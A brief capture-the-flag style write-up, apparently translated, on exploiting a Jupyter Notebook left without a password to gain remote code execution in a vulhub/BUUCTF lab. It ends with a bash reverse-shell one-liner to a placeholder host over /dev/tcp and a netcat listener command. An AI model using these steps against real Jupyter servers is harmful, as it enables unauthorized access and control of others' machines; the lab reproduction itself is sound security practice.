1 Introduction
Jupyter Notebook (previously called IPython notebook) is an interactive notebook that supports running more than 40 programming languages.
If the administrator does not configure a password for Jupyter Notebook, it will result in an unauthorized access vulnerability, where visitors can create a console and execute arbitrary Python code and commands.
2. Reproduce the environment
Sourced from https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/ map to facilitate direct reproduction with BUUCTF REAL environment
3. Use
Create a new terminal window, hehe hey, directly RCE
as shown below
4. I feel nothing to say
About the rebound shell
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
Then just listen on the other side
nc -lvp 8080(像这样)